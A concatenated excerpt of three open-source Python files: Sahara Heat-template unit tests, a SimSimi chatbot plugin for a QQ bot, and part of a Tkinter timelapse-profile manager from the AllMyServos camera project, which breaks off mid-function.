heat_template = self._make_heat_template(cluster, ng1, ng2)
self.override_config("use_neutron", False)
main_template = h._load_template(
'main.heat', {'resources':
heat_template._serialize_resources()})
self.assertEqual(
json.loads(main_template),
json.loads(f.get_file_text(
"tests/unit/resources/"
"test_serialize_resources_use_nn_without_autoassignment.heat"))
)
def test_load_template_use_nova_network_with_autoassignment(self):
"""Checks Heat cluster template with Nova Network enabled.
Nova Network checked with autoassignment of floating ip.
Two NodeGroups used: 'master' with Ephemeral drive attached and
'worker' with 2 attached volumes 10GB size each
"""
ng1, ng2 = self._make_node_groups()
cluster = self._make_cluster(None, ng1, ng2)
heat_template = self._make_heat_template(cluster, ng1, ng2)
self.override_config("use_neutron", False)
main_template = h._load_template(
'main.heat', {'resources':
heat_template._serialize_resources()})
self.assertEqual(
json.loads(main_template),
json.loads(f.get_file_text(
"tests/unit/resources/"
"test_serialize_resources_use_nn_with_autoassignment.heat"))
)
def test_load_template_with_anti_affinity_single_ng(self):
"""Checks Heat cluster template with Neutron enabled.
        Also checks that the anti-affinity feature is enabled for a single
        node process in a single node group.
"""
ng1 = tu.make_ng_dict('master', 42, ['namenode'], 1,
floating_ip_pool='floating', image_id=None,
volumes_per_node=0, volumes_size=0, id=1,
image_username='root')
ng2 = tu.make_ng_dict('worker', 42, ['datanode'], 2,
floating_ip_pool='floating', image_id=None,
volumes_per_node=0, volumes_size=0, id=2,
image_username='root')
cluster = tu.create_cluster("cluster", "tenant1", "general",
"1.2.1", [ng1, ng2],
user_keypair_id='user_key',
neutron_management_network='private_net',
default_image_id='1',
anti_affinity=['datanode'], image_id=None)
aa_heat_template = h.ClusterTemplate(cluster)
aa_heat_template.add_node_group_extra(ng1['id'], 1,
get_ud_generator('line1\nline2'))
aa_heat_template.add_node_group_extra(ng2['id'], 2,
get_ud_generator('line2\nline3'))
self.override_config("use_neutron", True)
main_template = h._load_template(
'main.heat', {'resources':
aa_heat_template._serialize_resources()})
self.assertEqual(
json.loads(main_template),
json.loads(f.get_file_text(
"tests/unit/resources/"
"test_serialize_resources_aa.heat")))
class TestClusterStack(testtools.TestCase):
@mock.patch("sahara.context.sleep", return_value=None)
def test_wait_completion(self, _):
stack = FakeHeatStack('CREATE_IN_PROGRESS', 'CREATE_COMPLETE')
h.wait_stack_completion(stack)
stack = FakeHeatStack('UPDATE_IN_PROGRESS', 'UPDATE_COMPLETE')
h.wait_stack_completion(stack)
stack = FakeHeatStack('DELETE_IN_PROGRESS', 'DELETE_COMPLETE')
h.wait_stack_completion(stack)
stack = FakeHeatStack('CREATE_IN_PROGRESS', 'CREATE_FAILED')
with testtools.ExpectedException(
ex.HeatStackException,
value_re="Heat stack failed with status CREATE_FAILED"):
h.wait_stack_completion(stack)
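# FakeHeatStack stands in for a heatclient stack object: it reports the
# initial "*_IN_PROGRESS" status until get() is called, after which it
# switches to the final status, letting wait_stack_completion() poll to
# completion without a real Heat service.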
class FakeHeatStack(object):
def __init__(self, stack_status=None, new_status=None, stack_name=None):
self.stack_status = stack_status or ''
self.new_status = new_status or ''
self.stack_name = stack_name or ''
def get(self):
self.stack_status = self.new_status
@property
def status(self):
s = self.stack_status
return s[s.index('_') + 1:]
def get_ud_generator(s):
def generator(*args, **kwargs):
return s
return generator
| apache-2.0 |
evilbinary/robot | plugins/simsimi.py | 1 | 4085 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# Author : cold
# E-mail : [email protected]
# Date : 14/01/16 11:33:32
# Desc : SimSimi plugin
#
import json
from tornadohttpclient import TornadoHTTPClient
import config
import random
from plugins import BasePlugin
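# The plugin reads its settings from the bot-wide `config` module; a sketch of
# the entries it looks up below (values are illustrative only):
#
#   SimSimi_Enabled = True
#   SimSimi_Proxy = None              # or ("proxy-host", 8080)
#   QQ_GROUP_NICK = u"bot"
#   TRACE = False                     # optional, enables HTTP client debugging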
class SimSimiTalk(object):
""" 模拟浏览器与SimSimi交流
:params http: HTTP 客户端实例
:type http: ~tornadhttpclient.TornadoHTTPClient instance
"""
def __init__(self, http = None):
self.http = http or TornadoHTTPClient()
if not http:
self.http.set_user_agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/28.0.1500.71 Chrome/28.0.1500.71 Safari/537.36")
self.http.debug = getattr(config, "TRACE", False)
self.http.validate_cert = False
self.http.set_global_headers({"Accept-Charset": "UTF-8,*;q=0.5"})
self.url = "http://www.simsimi.com/func/req"
self.params = {"lc":"zh", "ft":0.0}
self.ready = False
self.fetch_kwargs = {}
if config.SimSimi_Proxy:
self.fetch_kwargs.update(proxy_host = config.SimSimi_Proxy[0],
proxy_port = config.SimSimi_Proxy[1])
self._setup_cookie()
def _setup_cookie(self):
def callback(resp):
self.ready = True
self.http.get("http://www.simsimi.com", callback = callback)
def talk(self, msg, callback):
""" 聊天
:param msg: 信息
:param callback: 接收响应的回调
"""
headers = {"Referer":"http://www.simsimi.com/talk.htm",
"Accept":"application/json, text/javascript, */*; q=0.01",
"Accept-Language":"zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
"Content-Type":"application/json; charset=utf-8",
"X-Requested-With":"XMLHttpRequest",
}
if not msg.strip():
return callback(u"小的在")
params = {"msg":msg.encode("utf-8")}
params.update(self.params)
def _talk(resp):
data = {}
if resp.body:
try:
data = json.loads(resp.body)
except ValueError:
pass
            callback(data.get("response", u"。。。。"))
self.http.get(self.url, params, headers = headers,
callback = _talk)
class SimSimiPlugin(BasePlugin):
simsimi = None
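    # Reply only when SimSimi_Enabled is set. Group messages (type 'g') are
    # answered roughly 75% of the time, and only when the text starts or ends
    # with the bot's nickname or the configured QQ_GROUP_NICK (optionally
    # prefixed with '@'); if no nickname is set, any group message matches.
    # Other message types are ignored.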
def is_match(self, form_uin, content, type):
if not getattr(config, "SimSimi_Enabled", False):
return False
else:
self.simsimi = SimSimiTalk()
if type == "g" and random.choice('abcd')!='a':
if self.nickname !=None:
if content.startswith(self.nickname.strip()) or \
content.endswith(self.nickname.strip()) or \
content.startswith(config.QQ_GROUP_NICK.strip()) or \
content.endswith(config.QQ_GROUP_NICK.strip()) or \
content.startswith('@'+config.QQ_GROUP_NICK.strip()) or \
content.endswith('@'+config.QQ_GROUP_NICK.strip()):
self.content = content.strip(self.nickname).strip(config.QQ_GROUP_NICK.strip())
return True
else:
return False
else:
self.content = content
return True
return False
def handle_message(self, callback):
self.simsimi.talk(self.content, callback)
if __name__ == "__main__":
import threading,time
simsimi = SimSimiTalk()
def callback(response):
print response
simsimi.http.stop()
def talk():
while 1:
if simsimi.ready:
simsimi.talk("nice to meet you", callback)
break
else:
time.sleep(1)
t = threading.Thread(target = talk)
t.setDaemon(True)
t.start()
simsimi.http.start()
| mit |
allmyservos/allmyservos | contrib/AllMyServos/Camera/TkTimelapseManager.py | 1 | 29896 | #!/usr/bin/python
#######################################################################
# AllMyServos - Fun with PWM
# Copyright (C) 2015 Donate BTC:14rVTppdYQzLrqay5fp2FwP3AXvn3VSZxQ
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#######################################################################
import datetime, Tkinter, JsonBlob, Camera, Timelapse
from __bootstrap import AmsEnvironment
from Tkinter import *
from TkBlock import *
## UI for camera media
class TkTimelapseManager(TkPage):
def __init__(self, parent, gui, **options):
""" Initializes the TkTimelapseManager object
@param parent
@param gui
@param options
"""
super(TkTimelapseManager,self).__init__(parent, gui, **options)
try:
self.gui.kbthread
except:
self.gui.kbthread = Keyboard.KeyboardThread.GetInstance()
self.kbthread = self.gui.kbthread
try:
self.gui.camera
except:
self.gui.camera = Camera.Camera(self.gui.scheduler, self.kbthread, self.notifier)
self.camera = self.gui.camera
self.timelapse = Timelapse.Timelapse(self.camera)
def setup(self):
""" setup gui menu
"""
try:
self.gui.menus['cam']
except:
self.gui.menus['cam'] = Tkinter.Menu(self.gui.menubar, tearoff=0, bg=self.colours['menubg'], fg=self.colours['menufg'], activeforeground=self.colours['menuactivefg'], activebackground=self.colours['menuactivebg'])
self.addMenu(label="Camera", menu=self.gui.menus['cam'])
self.gui.menus['cam'].add_command(label="Timelapse", command=self.OnManageClick)
#=== VIEWS ===#
def listProfiles(self):
""" view - list timelapse profiles
"""
self.open()
self.widgets['mainlabel'] = Tkinter.Label(self.widgets['tframe'],text='Camera / Timelapse', anchor=NW, bg=self.colours['bg'], fg=self.colours['headingfg'], font=self.fonts['heading'])
self.widgets['mainlabel'].grid(column=0,row=self.gridrow,sticky='EW')
self.widgets['addprofile'] = Tkinter.Button(self.widgets['tframe'],text=u"Add Profile", image=self.images['add'], command=self.OnAddProfileClick, bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['addprofile'].grid(column=6,row=self.gridrow)
self.gridrow += 1
if (any(self.profiles)):
self.widgets['nameLabel'] = Tkinter.Label(self.widgets['tframe'],text='Name', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['nameLabel'].grid(column=0,row=self.gridrow,sticky='EW')
self.widgets['modeLabel'] = Tkinter.Label(self.widgets['tframe'],text='Mode', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['modeLabel'].grid(column=1,row=self.gridrow,sticky='EW')
self.widgets['waitLabel'] = Tkinter.Label(self.widgets['tframe'],text='Interval', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['waitLabel'].grid(column=2,row=self.gridrow,sticky='EW')
self.widgets['lengthLabel'] = Tkinter.Label(self.widgets['tframe'],text='Length', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['lengthLabel'].grid(column=3,row=self.gridrow,sticky='EW')
self.widgets['actLabel'] = Tkinter.Label(self.widgets['tframe'],text='Activate', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['actLabel'].grid(column=4,row=self.gridrow,sticky='EW')
self.widgets['editLabel'] = Tkinter.Label(self.widgets['tframe'],text='Edit', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['editLabel'].grid(column=5,row=self.gridrow,sticky='EW')
self.widgets['editLabel'] = Tkinter.Label(self.widgets['tframe'],text='Media', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['editLabel'].grid(column=6,row=self.gridrow,sticky='EW')
self.gridrow += 1
rowcolour = self.colours['rowbg']
rowcount = 1
for k, v in self.profiles.items():
rowcolour = self.colours['rowaltbg'] if rowcount % 2 == 0 else self.colours['rowbg']
rowcount += 1
self.widgets['nameData{}'.format(k)] = Tkinter.Label(self.widgets['tframe'],text=v.jsonData['name'], bg=rowcolour, fg=self.colours['fg'], height=2)
self.widgets['nameData{}'.format(k)].grid(column=0,row=self.gridrow,sticky='EW')
self.widgets['modeData{}'.format(k)] = Tkinter.Label(self.widgets['tframe'],text=v.jsonData['cap_mode'], bg=rowcolour, fg=self.colours['fg'], height=2)
self.widgets['modeData{}'.format(k)].grid(column=1,row=self.gridrow,sticky='EW')
self.widgets['waitData{}'.format(k)] = Tkinter.Label(self.widgets['tframe'],text=v.jsonData['{}_wait'.format(v.jsonData['cap_mode'])], bg=rowcolour, fg=self.colours['fg'], height=2)
self.widgets['waitData{}'.format(k)].grid(column=2,row=self.gridrow,sticky='EW')
self.widgets['lengthData{}'.format(k)] = Tkinter.Label(self.widgets['tframe'],text=v.jsonData['video_length'] if v.jsonData['cap_mode'] == 'video' else '-', bg=rowcolour, fg=self.colours['fg'], height=2)
self.widgets['lengthData{}'.format(k)].grid(column=3,row=self.gridrow,sticky='EW')
self.widgets['actButton{}'.format(k)] = Tkinter.Button(self.widgets['tframe'],text=u"Activate", image=self.images['stop'] if v.jsonData['active'] else self.images['play'], bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'], command=lambda x = k:self.OnActivateClick(x))
self.widgets['actButton{}'.format(k)].grid(column=4,row=self.gridrow,sticky='EW')
self.widgets['editButton{}'.format(k)] = Tkinter.Button(self.widgets['tframe'],text=u"Edit", image=self.images['process'], bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'], command=lambda x = k:self.OnEditProfileClick(x))
self.widgets['editButton{}'.format(k)].grid(column=5,row=self.gridrow,sticky='EW')
self.widgets['mediaButton{}'.format(k)] = Tkinter.Button(self.widgets['tframe'],text=u"Media", image=self.images['image'], bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'], command=lambda x = k:self.OnMediaClick(x))
self.widgets['mediaButton{}'.format(k)].grid(column=6,row=self.gridrow,sticky='EW')
self.gridrow += 1
else:
self.widgets['noLabel'] = Tkinter.Label(self.widgets['tframe'],text='There are currently no timelapse profiles', anchor=W, bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['noLabel'].grid(column=0,row=self.gridrow,sticky='EW')
def editProfile(self):
""" view - edit profile
"""
self.open()
self.widgets['mainlabel'] = Tkinter.Label(self.widgets['tframe'],text='Camera / Timelapse / Edit', anchor=NW, bg=self.colours['bg'], fg=self.colours['headingfg'], font=self.fonts['heading'])
self.widgets['mainlabel'].grid(column=0,row=self.gridrow,columnspan=2,pady=10,sticky='EW')
self.gridrow += 1
self.widgets['activeLabel'] = Tkinter.Label(self.widgets['tframe'],text='Active', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['activeLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.variables['active'] = Tkinter.BooleanVar()
self.variables['active'].set(self.profile.jsonData['active'])
self.widgets['activeentry'] = Tkinter.Checkbutton(self.widgets['tframe'], variable=self.variables['active'], text='', anchor=W, command=self.OnToggleActive, bg=self.colours['inputbg'], fg=self.colours['inputfg'], activebackground=self.colours['activebg'], selectcolor=self.colours['inputbg'], disabledforeground=self.colours['greyborder'])
self.widgets['activeentry'].grid(column=1,row=self.gridrow, padx=5, sticky="W")
self.gridrow += 1
self.widgets['nameLabel'] = Tkinter.Label(self.widgets['tframe'],text='Name', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['nameLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.variables['name'] = Tkinter.StringVar()
if(self.profile.jsonData['name'] != ''):
self.variables['name'].set(self.profile.jsonData['name'])
self.widgets['nameentry'] = Tkinter.Entry(self.widgets['tframe'], textvariable=self.variables['name'], bg=self.colours['inputbg'], fg=self.colours['inputfg'])
self.widgets['nameentry'].grid(column=1,row=self.gridrow,pady=10,sticky='W')
self.gridrow += 1
self.widgets['capLabel'] = Tkinter.Label(self.widgets['tframe'],text='Capture Mode', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['capLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.widgets['rmframe'] = Tkinter.Frame(self.widgets['tframe'], bg=self.colours['bg'])
self.widgets['rmframe'].grid(column=1,row=self.gridrow, sticky='W')
self.widgets['stillimg'] = Tkinter.PhotoImage(file = os.path.join(AmsEnvironment.AppPath(), 'images', 'camera','still.gif'))
self.widgets['recstillbutton'] = Tkinter.Button(self.widgets['rmframe'],text=u"Still", image=self.widgets['stillimg'], command=self.OnStillModeClick, bg=self.colours['bg'], activebackground=self.colours['bg'], highlightbackground=self.colours['buttonborder'])
self.widgets['recstillbutton'].grid(column=0,row=self.gridrow)
self.widgets['videoimg'] = Tkinter.PhotoImage(file = os.path.join(AmsEnvironment.AppPath(), 'images', 'camera','video.gif'))
self.widgets['recvidbutton'] = Tkinter.Button(self.widgets['rmframe'],text=u"Video", image=self.widgets['videoimg'], command=self.OnVideoModeClick, bg=self.colours['bg'], activebackground=self.colours['bg'], highlightbackground=self.colours['buttonborder'])
self.widgets['recvidbutton'].grid(column=1,row=self.gridrow)
self.widgets['recmodeLabel'] = Tkinter.Label(self.widgets['rmframe'],text='Video' if self.profile.jsonData['cap_mode'] == 'video' else 'Photo', anchor=W, bg=self.colours['bg'], fg=self.colours['valuefg'])
self.widgets['recmodeLabel'].grid(column=2,row=self.gridrow,padx=10, sticky='EW')
self.gridrow += 1
self.widgets['waitLabel'] = Tkinter.Label(self.widgets['tframe'],text='Wait', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['waitLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.widgets['waitframe'] = Tkinter.Frame(self.widgets['tframe'], bg=self.colours['bg'])
self.widgets['waitframe'].grid(column=1,row=self.gridrow,columnspan=2,sticky='EW')
self.gridrow += 1
self.widgets['profileLabel'] = Tkinter.Label(self.widgets['tframe'],text='Camera Profile', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['profileLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.variables['cam_profile'] = Tkinter.StringVar()
camProfile = self.profile.getCamProfile() if self.profile.jsonData['cam_profile'] != None else None
if(camProfile != None):
self.variables['cam_profile'].set(camProfile.jsonData['profile_name'])
else:
self.variables['cam_profile'].set(self.camera.cam_profile.jsonData['profile_name'])
names = Camera.CameraProfile.GetAllNames()
self.widgets['camproentry'] = Tkinter.OptionMenu(self.widgets['tframe'],self.variables['cam_profile'], *names)
self.widgets['camproentry'].config(bg=self.colours['inputbg'], fg=self.colours['inputfg'], activeforeground=self.colours['activefg'], activebackground=self.colours['activebg'])
self.widgets['camproentry'].grid(column=1,row=self.gridrow,sticky='W')
self.gridrow += 1
self.updateCapMode()
self.widgets['optionsFrame'] = Tkinter.Frame(self.widgets['tframe'], bg=self.colours['bg'])
self.widgets['optionsFrame'].grid(column=0,row=self.gridrow,columnspan=2, sticky='EW')
self.gridrow = 0
self.widgets['backLabel'] = Tkinter.Label(self.widgets['optionsFrame'],text='Back', bg=self.colours['bg'], fg=self.colours['fg'], height=2)
self.widgets['backLabel'].grid(column=0,row=self.gridrow,sticky='EW')
self.widgets['saveLabel'] = Tkinter.Label(self.widgets['optionsFrame'],text='Save', bg=self.colours['bg'], fg=self.colours['fg'], height=2)
self.widgets['saveLabel'].grid(column=1,row=self.gridrow,sticky='EW')
if(self.profile.blobExists()):
self.widgets['deleteLabel'] = Tkinter.Label(self.widgets['optionsFrame'],text='Delete', bg=self.colours['bg'], fg=self.colours['fg'], height=2)
self.widgets['deleteLabel'].grid(column=2,row=self.gridrow,sticky='EW')
self.gridrow += 1
self.widgets['back'] = Tkinter.Button(self.widgets['optionsFrame'],text=u"Back", image=self.images['back'], command=self.OnManageClick, bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['back'].grid(column=0,row=self.gridrow)
self.widgets['savepro'] = Tkinter.Button(self.widgets['optionsFrame'],text=u"Save Profile", image=self.images['save'], command=self.OnSaveProfileClick, bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['savepro'].grid(column=1,row=self.gridrow)
if(self.profile.blobExists()):
self.widgets['deletepro'] = Tkinter.Button(self.widgets['optionsFrame'],text=u"Delete Profile", image=self.images['delete'], command=self.OnDeleteProfileClick, bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['deletepro'].grid(column=2,row=self.gridrow)
def stillWaitOptions(self, rootElem):
""" partial view - adds elements for still options
@param rootElem
"""
if ('waitbody' in self.widgets):
self.widgets['waitbody'].grid_forget()
del(self.widgets['waitbody'])
self.widgets['waitbody'] = Tkinter.Frame(rootElem, bg=self.colours['bg'])
self.widgets['waitbody'].grid(column=0,row=0,columnspan=2, sticky='EW')
self.widgets['info1'] = Tkinter.Label(self.widgets['waitbody'],text='Capture an image every ', bg=self.colours['bg'], fg=self.colours['valuefg'], height=2)
self.widgets['info1'].grid(column=0,row=0,sticky='EW')
self.variables['still_wait'] = Tkinter.IntVar()
self.variables['still_wait'].set(self.profile.getWait())
self.widgets['waitentry'] = Tkinter.Entry(self.widgets['waitbody'], textvariable=self.variables['still_wait'], width=5, bg=self.colours['inputbg'], fg=self.colours['inputfg'])
self.widgets['waitentry'].grid(column=1,row=0,sticky='EW')
self.widgets['info1'] = Tkinter.Label(self.widgets['waitbody'],text=' seconds', bg=self.colours['bg'], fg=self.colours['valuefg'], height=2)
self.widgets['info1'].grid(column=2,row=0,sticky='EW')
def videoWaitOptions(self, rootElem):
""" partial view - adds elements for video options
@param rootElem
"""
if ('waitbody' in self.widgets):
self.widgets['waitbody'].grid_forget()
del(self.widgets['waitbody'])
self.widgets['waitbody'] = Tkinter.Frame(rootElem, bg=self.colours['bg'])
self.widgets['waitbody'].grid(column=0,row=0,columnspan=2, sticky='EW')
self.widgets['info1'] = Tkinter.Label(self.widgets['waitbody'],text='Capture ', bg=self.colours['bg'], fg=self.colours['valuefg'], height=2)
self.widgets['info1'].grid(column=0,row=0,sticky='EW')
self.variables['video_length'] = Tkinter.IntVar()
self.variables['video_length'].set(self.profile.jsonData['video_length'])
self.widgets['waitentry'] = Tkinter.Entry(self.widgets['waitbody'], textvariable=self.variables['video_length'], width=5, bg=self.colours['inputbg'], fg=self.colours['inputfg'])
self.widgets['waitentry'].grid(column=1,row=0,sticky='EW')
self.widgets['info2'] = Tkinter.Label(self.widgets['waitbody'],text=' seconds of footage every ', bg=self.colours['bg'], fg=self.colours['valuefg'], height=2)
self.widgets['info2'].grid(column=2,row=0,sticky='EW')
self.variables['video_wait'] = Tkinter.IntVar()
self.variables['video_wait'].set(self.profile.getWait())
self.widgets['waitentry'] = Tkinter.Entry(self.widgets['waitbody'], textvariable=self.variables['video_wait'], width=5, bg=self.colours['inputbg'], fg=self.colours['inputfg'])
self.widgets['waitentry'].grid(column=3,row=0,sticky='EW')
self.widgets['info3'] = Tkinter.Label(self.widgets['waitbody'],text=' seconds', bg=self.colours['bg'], fg=self.colours['valuefg'], height=2)
self.widgets['info3'].grid(column=4,row=0,sticky='EW')
def listMedia(self):
""" view - lists media items associated with a timelapse
"""
self.open()
self.widgets['mainlabel'] = Tkinter.Label(self.widgets['tframe'],text='Camera / Timelapse / Media', anchor=NW, bg=self.colours['bg'], fg=self.colours['headingfg'], font=self.fonts['heading'])
self.widgets['mainlabel'].grid(column=0,row=self.gridrow,columnspan=3,sticky='EW')
self.gridrow += 1
if (any(self.profile.jsonData['media'])):
self.widgets['timeLabel'] = Tkinter.Label(self.widgets['tframe'],text='#', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['timeLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.widgets['timeLabel'] = Tkinter.Label(self.widgets['tframe'],text='Time', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['timeLabel'].grid(column=1,row=self.gridrow,padx=10,sticky='W')
self.widgets['fileLabel'] = Tkinter.Label(self.widgets['tframe'],text='Filename', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['fileLabel'].grid(column=2,row=self.gridrow,padx=10,sticky='W')
self.gridrow += 1
rowcolour = self.colours['rowbg']
rowcount = 1
for x in self.profile.jsonData['media']:
rowcolour = self.colours['rowaltbg'] if rowcount % 2 == 0 else self.colours['rowbg']
self.widgets['numData{}'.format(x['time'])] = Tkinter.Label(self.widgets['tframe'],text='{}.'.format(rowcount), bg=rowcolour, fg=self.colours['headingfg'], height=2)
self.widgets['numData{}'.format(x['time'])].grid(column=0,row=self.gridrow,sticky='EW')
self.widgets['timeData{}'.format(x['time'])] = Tkinter.Label(self.widgets['tframe'],text=datetime.datetime.fromtimestamp(float(x['time'])/1000), bg=rowcolour, fg=self.colours['fg'], height=2)
self.widgets['timeData{}'.format(x['time'])].grid(column=1,row=self.gridrow,sticky='W')
self.widgets['fileData{}'.format(x['time'])] = Tkinter.Label(self.widgets['tframe'],text=x['filename'], bg=rowcolour, fg=self.colours['valuefg'], height=2)
self.widgets['fileData{}'.format(x['time'])].grid(column=2,row=self.gridrow,sticky='EW')
rowcount += 1
self.gridrow += 1
else:
self.widgets['noLabel'] = Tkinter.Label(self.widgets['tframe'],text='This profile has no media', anchor=W, bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['noLabel'].grid(column=0,row=self.gridrow,sticky='EW')
self.gridrow += 1
self.widgets['optionsFrame'] = Tkinter.Frame(self.widgets['tframe'], bg=self.colours['bg'])
self.widgets['optionsFrame'].grid(column=0,row=self.gridrow,columnspan=2, sticky='EW')
self.gridrow = 0
self.widgets['backLabel'] = Tkinter.Label(self.widgets['optionsFrame'],text='Back', bg=self.colours['bg'], fg=self.colours['fg'], height=2)
self.widgets['backLabel'].grid(column=0,row=self.gridrow,sticky='EW')
self.widgets['delLabel'] = Tkinter.Label(self.widgets['optionsFrame'],text='Delete', bg=self.colours['bg'], fg=self.colours['fg'], height=2)
self.widgets['delLabel'].grid(column=1,row=self.gridrow,sticky='EW')
self.gridrow += 1
self.widgets['back'] = Tkinter.Button(self.widgets['optionsFrame'],text=u"Back", image=self.images['back'], command=self.OnManageClick, bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['back'].grid(column=0,row=self.gridrow)
self.widgets['del'] = Tkinter.Button(self.widgets['optionsFrame'],text=u"Delete", image=self.images['delete'], command=self.OnDeleteMediaClick, bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['del'].grid(column=1,row=self.gridrow)
def deleteMedia(self):
""" view - delete media
"""
self.open()
self.widgets['mainlabel'] = Tkinter.Label(self.widgets['tframe'],text='Camera / Timelapse / Media / Delete', anchor=NW, bg=self.colours['bg'], fg=self.colours['headingfg'], font=self.fonts['heading'])
self.widgets['mainlabel'].grid(column=0,row=self.gridrow,columnspan=3,sticky='EW')
self.gridrow += 1
self.widgets['mLabel'] = Tkinter.Label(self.widgets['tframe'],text='{} item(s)'.format(len(self.profile.jsonData['media'])), bg=self.colours['bg'], fg=self.colours['headingfg'], font=self.fonts['heading2'])
self.widgets['mLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.gridrow += 1
self.widgets['metaLabel'] = Tkinter.Label(self.widgets['tframe'],text='Clear Meta Data', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['metaLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.variables['meta'] = Tkinter.BooleanVar()
self.variables['meta'].set(True)
self.widgets['metaentry'] = Tkinter.Checkbutton(self.widgets['tframe'], variable=self.variables['meta'], text='', anchor=W, bg=self.colours['inputbg'], fg=self.colours['inputfg'], activebackground=self.colours['activebg'], selectcolor=self.colours['inputbg'], disabledforeground=self.colours['greyborder'])
self.widgets['metaentry'].grid(column=1,row=self.gridrow, padx=5, sticky="W")
self.gridrow += 1
self.widgets['mediaLabel'] = Tkinter.Label(self.widgets['tframe'],text='Delete Media Files', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['mediaLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.variables['media'] = Tkinter.BooleanVar()
self.variables['media'].set(True)
self.widgets['mediaentry'] = Tkinter.Checkbutton(self.widgets['tframe'], variable=self.variables['media'], text='', anchor=W, command=self.OnToggleDeleteMedia, bg=self.colours['inputbg'], fg=self.colours['inputfg'], activebackground=self.colours['activebg'], selectcolor=self.colours['inputbg'], disabledforeground=self.colours['greyborder'])
self.widgets['mediaentry'].grid(column=1,row=self.gridrow, padx=5, sticky="W")
self.gridrow += 1
self.widgets['optionsFrame'] = Tkinter.Frame(self.widgets['tframe'], bg=self.colours['bg'])
self.widgets['optionsFrame'].grid(column=0,row=self.gridrow,columnspan=2, sticky='EW')
self.gridrow = 0
self.widgets['backLabel'] = Tkinter.Label(self.widgets['optionsFrame'],text='Back', bg=self.colours['bg'], fg=self.colours['fg'], height=2)
self.widgets['backLabel'].grid(column=0,row=self.gridrow,sticky='EW')
self.widgets['delLabel'] = Tkinter.Label(self.widgets['optionsFrame'],text='Accept', bg=self.colours['bg'], fg=self.colours['fg'], height=2)
self.widgets['delLabel'].grid(column=1,row=self.gridrow,sticky='EW')
self.gridrow += 1
self.widgets['back'] = Tkinter.Button(self.widgets['optionsFrame'],text=u"Back", image=self.images['back'], command=lambda x = self.profile.jbIndex: self.OnMediaClick(x), bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['back'].grid(column=0,row=self.gridrow)
self.widgets['savemap'] = Tkinter.Button(self.widgets['optionsFrame'],text=u"Save Map", image=self.images['save'], command=self.OnDeleteMediaConfirmClick, bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['savemap'].grid(column=1,row=self.gridrow)
#=== ACTIONS ===#
def OnManageClick(self):
""" action - manage timelapse
"""
self.profiles = JsonBlob.JsonBlob.all('Timelapse', 'TimelapseProfile')
self.listProfiles()
def OnAddProfileClick(self):
""" action - display add profile page
"""
self.profile = Timelapse.TimelapseProfile()
self.editProfile()
def OnEditProfileClick(self, index):
""" action - display edit profile page
@param index
"""
self.profile = Timelapse.TimelapseProfile(index)
if (self.profile.blobExists()):
self.editProfile()
def OnSaveProfileClick(self):
""" action - saves a profile
"""
if (hasattr(self, 'profile')):
name = self.variables['name'].get()
waitError = False
try:
wait = int(self.variables['{}_wait'.format(self.profile.jsonData['cap_mode'])].get())
except:
wait = 10
waitError = True
lengthError = False
try:
length = int(self.variables['video_length'].get()) if self.profile.jsonData['cap_mode'] == 'video' else 0
except:
length = 1
